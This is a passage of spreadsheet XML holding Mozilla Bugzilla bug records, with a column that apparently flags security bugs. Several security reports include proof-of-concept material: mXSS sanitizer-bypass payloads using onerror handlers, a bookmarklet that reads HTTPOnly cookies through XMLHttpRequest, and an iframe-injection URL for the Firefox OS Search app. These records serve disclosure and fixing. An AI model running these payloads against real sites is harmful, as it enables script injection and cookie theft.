          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4544" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4544" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4544" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4544" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4544" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4544" t="inlineStr">
        <is>
          <t>[adv-main29+][adv-esr24.5+][qa-]</t>
        </is>
      </c>
      <c r="Q4544" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4544" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4544" t="inlineStr">
        <is>
          <t>mozilla31</t>
        </is>
      </c>
      <c r="T4544" t="n">
        <v>1</v>
      </c>
      <c r="U4544" t="n">
        <v>0</v>
      </c>
      <c r="V4544" t="n">
        <v>38</v>
      </c>
      <c r="W4544" t="inlineStr">
        <is>
          <t>We have a number of memory reporter wrappers for realloc in nsXPComInit.cpp, here's the one for ICU as an example:
http://mxr.mozilla.org/mozilla-central/source/xpcom/build/nsXPComInit.cpp#365
This wrapper (and the other ones) don't correctly handle the case of being called with a zero size; |realloc| acts like |free| in such a case, and therefore the "realloc failed" case would be touching already-freed memory.
We should fix the wrappers and possibly backport.
Marking as security-sensitive, but I don't know how exploitable this really is.</t>
        </is>
      </c>
      <c r="X4544" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4545">
      <c r="A4545" t="n">
        <v>1030667</v>
      </c>
      <c r="B4545" t="inlineStr">
        <is>
          <t>2014-06-26 02:49:09 -0700</t>
        </is>
      </c>
      <c r="C4545" t="inlineStr">
        <is>
          <t>AddressSanitizer: double-free with zero-length XHR, depending on behavior of realloc(p, 0)</t>
        </is>
      </c>
      <c r="D4545" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:26 -0700</t>
        </is>
      </c>
      <c r="E4545" t="n">
        <v>1</v>
      </c>
      <c r="F4545" t="n">
        <v>1</v>
      </c>
      <c r="G4545" t="n">
        <v>3</v>
      </c>
      <c r="H4545" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4545" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4545" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4545" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4545" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4545" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4545" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4545" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4545" t="inlineStr">
        <is>
          <t>[reporter-external][adv-main36+][b2g-adv-main2.2-]</t>
        </is>
      </c>
      <c r="Q4545" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4545" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4545" t="inlineStr">
        <is>
          <t>mozilla36</t>
        </is>
      </c>
      <c r="T4545" t="n">
        <v>1</v>
      </c>
      <c r="U4545" t="n">
        <v>0</v>
      </c>
      <c r="V4545" t="n">
        <v>59</v>
      </c>
      <c r="W4545" t="inlineStr">
        <is>
          <t>Created attachment 8446428
log
+++ This bug was initially created as a clone of Bug #1023758 +++
+++ This bug was initially created as a clone of Bug #1021612 +++
(The ASan fun never seems to stop, does it? ;-) )
I tested Steven's asan build ( http://people.mozilla.org/~stmichaud/bmo/firefox-asan.dmg ) from Jun 23 (bug 1023758 comment 42) and when I pressed "Earth" in a Google Maps page, the asan build crashed while attempting double-free on 0x6020000a1e90 with mozilla::ArrayBufferBuilder::setCapacity on the stack.
I've set dom.cycle_collector.incremental to false to bypass bug 1023758 for the moment.
Setting s-s and sec-critical until we know what is going on. Setting needinfo? from :Waldo who last worked on lots of ArrayBuffer stuff.</t>
        </is>
      </c>
      <c r="X4545" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4546">
      <c r="A4546" t="n">
        <v>457340</v>
      </c>
      <c r="B4546" t="inlineStr">
        <is>
          <t>2008-09-26 16:49:31 -0700</t>
        </is>
      </c>
      <c r="C4546" t="inlineStr">
        <is>
          <t>compare staging-1.9 and production-1.9 for discrepancies</t>
        </is>
      </c>
      <c r="D4546" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4546" t="n">
        <v>1</v>
      </c>
      <c r="F4546" t="n">
        <v>1</v>
      </c>
      <c r="G4546" t="n">
        <v>5</v>
      </c>
      <c r="H4546" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4546" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4546" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4546" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4546" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4546" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4546" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4546" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4546" t="inlineStr"/>
      <c r="Q4546" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4546" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4546" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4546" t="n">
        <v>1</v>
      </c>
      <c r="U4546" t="n">
        <v>0</v>
      </c>
      <c r="V4546" t="n">
        <v>20</v>
      </c>
      <c r="W4546" t="inlineStr">
        <is>
          <t>Created attachment 340670
differences between production 1.9 and staging 1.9</t>
        </is>
      </c>
      <c r="X4546" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4547">
      <c r="A4547" t="n">
        <v>1667113</v>
      </c>
      <c r="B4547" t="inlineStr">
        <is>
          <t>2020-09-24 07:31:55 -0700</t>
        </is>
      </c>
      <c r="C4547" t="inlineStr">
        <is>
          <t>mXSS payload (combined svg, style, title element) lead to HTML Sanitizer Bypass and XSS via Clipboard API (paste)</t>
        </is>
      </c>
      <c r="D4547" t="inlineStr">
        <is>
          <t>2024-05-30 10:19:04 -0700</t>
        </is>
      </c>
      <c r="E4547" t="n">
        <v>1</v>
      </c>
      <c r="F4547" t="n">
        <v>1</v>
      </c>
      <c r="G4547" t="n">
        <v>3</v>
      </c>
      <c r="H4547" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4547" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4547" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4547" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4547" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4547" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4547" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4547" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4547" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][adv-main83+][adv-esr78.5+]</t>
        </is>
      </c>
      <c r="Q4547" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4547" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4547" t="inlineStr">
        <is>
          <t>84 Branch</t>
        </is>
      </c>
      <c r="T4547" t="n">
        <v>1</v>
      </c>
      <c r="U4547" t="n">
        <v>0</v>
      </c>
      <c r="V4547" t="n">
        <v>53</v>
      </c>
      <c r="W4547" t="inlineStr">
        <is>
          <t>Created attachment 9177645
uxss-svg-style-title.html
When continuing fuzzing the Firefox Nightly, I found another HTML sanitizer bypass with payload `&lt;svg&gt;&lt;style&gt;&lt;title&gt;[xss payload]`. 
The impact leads to HTML sanitizer bypass on privileged page and UXSS via clipboard API (paste). 
Although DOM tree on `document.body.innerHTML` show `&lt;svg&gt;&lt;style&gt;&lt;/style&gt;&lt;/svg&gt;`, but script execution is still possible.
Several XSS payloads I tested and it works:
- `&lt;svg&gt;&lt;style&gt;&lt;title&gt;&lt;audio src/onerror=alert(14)&gt;` 
- `&lt;svg&gt;&lt;style&gt;&lt;title&gt;&lt;img src/onerror=alert(14)&gt;` 
- `&lt;svg&gt;&lt;style&gt;&lt;title&gt;&lt;input src type=image onerror=alert(14)&gt;`
*(and another [xss payload] probably will works..)*
## Browser tested:
- Firefox Nightly 83.0a1 (2020-09-23) (64-bit)
- Firefox Release 81.0 (64-bit)
- Firefox ESR 78.3.0esr (64-bit)
## Steps to reproduce:
### HTML sanitizer bypass on privileged page
1. Go to about:config
2. Set `security.csp.enable` boolean from `true` -&gt; `false`
3. Restart Firefox Nightly
4. Go to about:config
5. Open Dev Tools (Ctrl+Shift+I)
6. Click Console tab
7. Paste the code `document.body.innerHTML = "&lt;svg&gt;&lt;style&gt;&lt;title&gt;&lt;audio src/onerror=alert(Components.utils.loadedComponents[0])&gt;"` to the browser console
8. XSS will execute
### UXSS via clipboard API (paste)
1. Download attached file "uxss-svg-style-title.html" (Sorry can't share direct-link, because GCP cloud console outage in Asia)
2. Click Copy Text
3. Go to https://output.jsbin.com/gocizet/ (TinyMCE Rich Editor form)
4. Paste with Ctrl+V or Right click -&gt; Paste into TinyMCE form
5. XSS will execute [pop alert(document.domain)]</t>
        </is>
      </c>
      <c r="X4547" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4548">
      <c r="A4548" t="n">
        <v>1289417</v>
      </c>
      <c r="B4548" t="inlineStr">
        <is>
          <t>2016-07-26 06:29:35 -0700</t>
        </is>
      </c>
      <c r="C4548" t="inlineStr">
        <is>
          <t>Pingdom account suspended</t>
        </is>
      </c>
      <c r="D4548" t="inlineStr">
        <is>
          <t>2016-08-17 19:39:29 -0700</t>
        </is>
      </c>
      <c r="E4548" t="n">
        <v>1</v>
      </c>
      <c r="F4548" t="n">
        <v>1</v>
      </c>
      <c r="G4548" t="n">
        <v>4</v>
      </c>
      <c r="H4548" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4548" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4548" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K4548" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4548" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4548" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4548" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4548" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4548" t="inlineStr"/>
      <c r="Q4548" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4548" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4548" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4548" t="n">
        <v>1</v>
      </c>
      <c r="U4548" t="n">
        <v>0</v>
      </c>
      <c r="V4548" t="n">
        <v>8</v>
      </c>
      <c r="W4548" t="inlineStr">
        <is>
          <t>Created attachment 8774725
Screen Shot 2016-07-26 at 9.28.02 AM.png
"There is one or more unpaid invoices in this account. Please contact the account owner (John Schneider). "</t>
        </is>
      </c>
      <c r="X4548" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4549">
      <c r="A4549" t="n">
        <v>824920</v>
      </c>
      <c r="B4549" t="inlineStr">
        <is>
          <t>2012-12-27 02:58:12 -0800</t>
        </is>
      </c>
      <c r="C4549" t="inlineStr">
        <is>
          <t>[Browser] double-tap fails to zoom out after double-tap zooming in</t>
        </is>
      </c>
      <c r="D4549" t="inlineStr">
        <is>
          <t>2013-04-03 01:06:21 -0700</t>
        </is>
      </c>
      <c r="E4549" t="n">
        <v>1</v>
      </c>
      <c r="F4549" t="n">
        <v>1</v>
      </c>
      <c r="G4549" t="n">
        <v>6</v>
      </c>
      <c r="H4549" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4549" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4549" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4549" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4549" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4549" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4549" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4549" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4549" t="inlineStr"/>
      <c r="Q4549" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4549" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4549" t="inlineStr">
        <is>
          <t>B2G C4 (2jan on)</t>
        </is>
      </c>
      <c r="T4549" t="n">
        <v>1</v>
      </c>
      <c r="U4549" t="n">
        <v>0</v>
      </c>
      <c r="V4549" t="n">
        <v>28</v>
      </c>
      <c r="W4549" t="inlineStr">
        <is>
          <t>Forked from bug 817127 comment 4. STR:
 1. Visit http://pastebin.mozilla.org/
 2. Double-tap the large-ish footer text ("Mozilla systems and collaborative tools..."
  --&gt; Browser zooms in to that text.
 3. Double-tap it again
Expected result: Browser zooms out.
Actual result: Browser doesn't zoom out.</t>
        </is>
      </c>
      <c r="X4549" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4550">
      <c r="A4550" t="n">
        <v>1280215</v>
      </c>
      <c r="B4550" t="inlineStr">
        <is>
          <t>2016-06-15 03:31:26 -0700</t>
        </is>
      </c>
      <c r="C4550" t="inlineStr">
        <is>
          <t>null pointer crashes in PeerConnectionMedia::EnsureIceGathering_s</t>
        </is>
      </c>
      <c r="D4550" t="inlineStr">
        <is>
          <t>2017-01-05 09:13:12 -0800</t>
        </is>
      </c>
      <c r="E4550" t="n">
        <v>1</v>
      </c>
      <c r="F4550" t="n">
        <v>1</v>
      </c>
      <c r="G4550" t="n">
        <v>3</v>
      </c>
      <c r="H4550" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4550" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4550" t="inlineStr">
        <is>
          <t>WebRTC: Networking</t>
        </is>
      </c>
      <c r="K4550" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4550" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4550" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4550" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4550" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q4550" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4550" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4550" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T4550" t="n">
        <v>1</v>
      </c>
      <c r="U4550" t="n">
        <v>0</v>
      </c>
      <c r="V4550" t="n">
        <v>22</v>
      </c>
      <c r="W4550" t="inlineStr">
        <is>
          <t>From crash-stats:
https://crash-stats.mozilla.com/signature/?signature=mozilla%3A%3APeerConnectionMedia%3A%3AEnsureIceGathering_s&amp;_columns=date&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform&amp;_columns=reason&amp;_columns=address&amp;page=1#reports
This suggests to me that the code that cancels the proxy lookup when the PeerConnectionMedia begins tearing down isn't working reliably. We don't seem to have any asserts that would catch this.
Marking as security for now, since a flaw in the proxy lookup cancellation code could imply security bugs elsewhere, and could maybe cause a dangling pointer to a PCM to be used (which is not what is happening here).</t>
        </is>
      </c>
      <c r="X4550" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4551">
      <c r="A4551" t="n">
        <v>1079893</v>
      </c>
      <c r="B4551" t="inlineStr">
        <is>
          <t>2014-10-08 07:38:52 -0700</t>
        </is>
      </c>
      <c r="C4551" t="inlineStr">
        <is>
          <t>Better formatting for Maintenance wiki reconfig updates</t>
        </is>
      </c>
      <c r="D4551" t="inlineStr">
        <is>
          <t>2017-05-08 09:48:46 -0700</t>
        </is>
      </c>
      <c r="E4551" t="n">
        <v>1</v>
      </c>
      <c r="F4551" t="n">
        <v>1</v>
      </c>
      <c r="G4551" t="n">
        <v>5</v>
      </c>
      <c r="H4551" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4551" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4551" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4551" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4551" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4551" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4551" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4551" t="inlineStr"/>
      <c r="Q4551" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4551" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4551" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4551" t="n">
        <v>1</v>
      </c>
      <c r="U4551" t="n">
        <v>0</v>
      </c>
      <c r="V4551" t="n">
        <v>8</v>
      </c>
      <c r="W4551" t="inlineStr">
        <is>
          <t>Compare:
https://wiki.mozilla.org/ReleaseEngineering/Maintenance#Reconfigs_.2F_Deployments
"bug 1035226 - Only use RUNTIME iff Mule"
and
"bug 1035226 - Pass RUNTIME to Gij for Mule"
Against:
"Bug 1035226 - Only use RUNTIME iff Mulet" (https://hg.mozilla.org/build/mozharness/rev/97f6c98a5437)
and
"Bug 1035226 - Pass RUNTIME to Gij for Mulet, r=ochameau" (https://hg.mozilla.org/build/mozharness/rev/5c900c15ff70)
Need to tweak:
https://hg.mozilla.org/build/tools/file/default/buildfarm/maintenance/end_to_end_reconfig.sh#l341
   341     grep summary "${RECONFIG_DIR}"/*_preview_changes.txt | \
   342         awk '{sub (/ r=.*$/,"");print substr($0, index($0,$2))}' | \
   343         sed 's/[Bb]ug \([0-9]*\):* *-* */\* {{bug|\1}} - /' | \
   344         sed 's/^[ \t]*//;s/[ \t,;]*$//' | \
   345         sed 's/^\([^\*]\)/\* \1/' | \
   346         sort -u &gt;&gt; "${RECONFIG_DIR}/reconfig_update_for_maintenance.wiki"
Not all versions of sed support using escape sequences such as '\t' - you need to insert a literal tab into the script, if we want to protect against them (though I wonder if Hg strips tabs out anyway?).
As such, |sed 's/^[ \t]*//;s/[ \t,;]*$//'| actually matches against the "t" in mulet lol.</t>
        </is>
      </c>
      <c r="X4551" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4552">
      <c r="A4552" t="n">
        <v>380418</v>
      </c>
      <c r="B4552" t="inlineStr">
        <is>
          <t>2007-05-11 10:24:11 -0700</t>
        </is>
      </c>
      <c r="C4552" t="inlineStr">
        <is>
          <t>XMLHttpRequest allows reading HTTPOnly cookies</t>
        </is>
      </c>
      <c r="D4552" t="inlineStr">
        <is>
          <t>2009-03-04 18:51:33 -0800</t>
        </is>
      </c>
      <c r="E4552" t="n">
        <v>1</v>
      </c>
      <c r="F4552" t="n">
        <v>1</v>
      </c>
      <c r="G4552" t="n">
        <v>3</v>
      </c>
      <c r="H4552" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4552" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4552" t="inlineStr">
        <is>
          <t>Networking: Cookies</t>
        </is>
      </c>
      <c r="K4552" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4552" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4552" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4552" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4552" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4552" t="inlineStr">
        <is>
          <t>[sg:want P2]</t>
        </is>
      </c>
      <c r="Q4552" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4552" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4552" t="inlineStr">
        <is>
          <t>mozilla1.9.1b2</t>
        </is>
      </c>
      <c r="T4552" t="n">
        <v>1</v>
      </c>
      <c r="U4552" t="n">
        <v>5</v>
      </c>
      <c r="V4552" t="n">
        <v>111</v>
      </c>
      <c r="W4552" t="inlineStr">
        <is>
          <t>XMLHttpRequest subverts the idea of HTTPOnly cookies since it allows sending a request and reading out Set-Cookie header of the response - even if it has HTTPOnly flag set. There are quite a few web applications out there that will send out a Set-Cookie header with the session cookie for every request just in case, thus rendering HTTPOnly flag ineffective.
To test you can go to http://www.yabbforum.com/community/ and use this bookmarklet:
javascript:var req = new XMLHttpRequest();req.open("GET", "/community/", false);req.send(null);alert(req.getAllResponseHeaders());alert(req.getResponseHeader("Set-Cookie"))
You will see a list of all response headers including Set-Cookie, and then the result of req.getResponseHeader("Set-Cookie"). I think Set-Cookie headers should be excluded from the list and req.getResponseHeader("Set-Cookie") should always return null. This protection is only necessary for unprivileged scripts, the implementation can be the same as in setRequestHeader.</t>
        </is>
      </c>
      <c r="X4552" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4553">
      <c r="A4553" t="n">
        <v>1102204</v>
      </c>
      <c r="B4553" t="inlineStr">
        <is>
          <t>2014-11-20 04:52:58 -0800</t>
        </is>
      </c>
      <c r="C4553" t="inlineStr">
        <is>
          <t>Remote HTML tag injection in Gaia Search app</t>
        </is>
      </c>
      <c r="D4553" t="inlineStr">
        <is>
          <t>2024-05-30 08:38:29 -0700</t>
        </is>
      </c>
      <c r="E4553" t="n">
        <v>1</v>
      </c>
      <c r="F4553" t="n">
        <v>1</v>
      </c>
      <c r="G4553" t="n">
        <v>6</v>
      </c>
      <c r="H4553" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4553" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4553" t="inlineStr">
        <is>
          <t>Gaia::Search</t>
        </is>
      </c>
      <c r="K4553" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4553" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4553" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4553" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4553" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4553" t="inlineStr">
        <is>
          <t>[systemsfe][reporter-external][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q4553" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4553" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4553" t="inlineStr">
        <is>
          <t>2.1 S9 (21Nov)</t>
        </is>
      </c>
      <c r="T4553" t="n">
        <v>1</v>
      </c>
      <c r="U4553" t="n">
        <v>0</v>
      </c>
      <c r="V4553" t="n">
        <v>39</v>
      </c>
      <c r="W4553" t="inlineStr">
        <is>
          <t>Created attachment 8525993
search.png
User Agent: Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.10 Safari/537.36
Steps to reproduce:
1. Start Firefox OS 2.1/2.2.
2. Open Search(Browser) app and launch following link.
http://alice.csrf.jp/http.php?s=308&amp;u=https://www.google.co.jp/search?q=%3Ciframe+mozbrowser+remote+mozapp%3D%22app%3A%2F%2Ffm.gaiamobile.org%2Fmanifest.webapp%22+src%3D%22app%3A%2F%2Ffm.gaiamobile.org%2Findex.html%22%3E
3. Search app. shows the search result of &lt;iframe...&gt;
4. Push HOME button and show home screen
5. Click "Browser" icon and launch Search app again
Actual results:
The built-in FM Radio app. is shown on the Search app. (see attached image)
Expected results:
FM Radio app. is not shown and a simple text "&lt;iframe mozbrowser ..." is shown on the Search app.</t>
        </is>
      </c>
      <c r="X4553" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4554">
      <c r="A4554" t="n">
        <v>38624</v>
      </c>
      <c r="B4554" t="inlineStr">
        <is>
          <t>2000-05-08 18:46:53 -0700</t>
        </is>
      </c>
      <c r="C4554" t="inlineStr">
        <is>
          <t>"New value" column smaller than "old value" column</t>
        </is>
      </c>
      <c r="D4554" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:21 -0800</t>
        </is>
      </c>
      <c r="E4554" t="n">
        <v>1</v>
      </c>
      <c r="F4554" t="n">
        <v>1</v>
      </c>
      <c r="G4554" t="n">
        <v>4</v>
      </c>
      <c r="H4554" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4554" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4554" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K4554" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4554" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4554" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4554" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4554" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4554" t="inlineStr">
        <is>
          <t>2.12</t>
        </is>
      </c>
      <c r="Q4554" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4554" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4554" t="inlineStr">
        <is>
          <t>Bugzilla 2.12</t>
        </is>
      </c>
      <c r="T4554" t="n">
        <v>1</v>
      </c>
      <c r="U4554" t="n">
        <v>0</v>
      </c>
      <c r="V4554" t="n">
        <v>9</v>
      </c>
      <c r="W4554" t="inlineStr">
        <is>
          <t>The "new value" column is smaller than the old value column, making it 
difficult to figure out exactly what was changed in a field like cc.
           What    |Old Value                   |New Value
----------------------------------------------------------------------------
                 CC|Antti.Nayha@oulu.fi,Crysgem@|Antti.Nayha@oulu.fi,Crysgem
                   |crosswinds.net,bissiri@eecs.|@crosswinds.net,bissiri@eec
                   |umich.edu,davidr8@home.com,d|s.umich.edu,davidr8@home.co
                   |baron@fas.harvard.edu,janc@n|m,dbaron@fas.harvard.edu,ja
                   |etscape.com,katakai@japan.su|nc@netscape.com,katakai@jap
                   |n.com,rich.burridge@Sun.COM,|an.sun.com,rich.burridge@Su
                   |tajima@eng.sun.com          |n.COM,tajima@eng.sun.com,va
                   |                            |rga@utcru.sk</t>
        </is>
      </c>
      <c r="X4554" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4555">
      <c r="A4555" t="n">
        <v>1192401</v>
      </c>
      <c r="B4555" t="inlineStr">
        <is>
          <t>2015-08-07 13:47:46 -0700</t>
        </is>
      </c>
      <c r="C4555" t="inlineStr">
        <is>
          <t>Crash due to Assertion failure: getSlotRef(EVAL).isUndefined(), at js/src/vm/GlobalObject.h:147</t>
        </is>
      </c>
      <c r="D4555" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:13 -0700</t>
        </is>
      </c>
      <c r="E4555" t="n">
        <v>1</v>
      </c>
      <c r="F4555" t="n">
        <v>1</v>
      </c>
      <c r="G4555" t="n">
        <v>3</v>
      </c>
      <c r="H4555" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4555" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4555" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4555" t="inlineStr">
        <is>
          <t>42 Branch</t>
        </is>
      </c>
      <c r="L4555" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4555" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4555" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4555" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4555" t="inlineStr">
        <is>
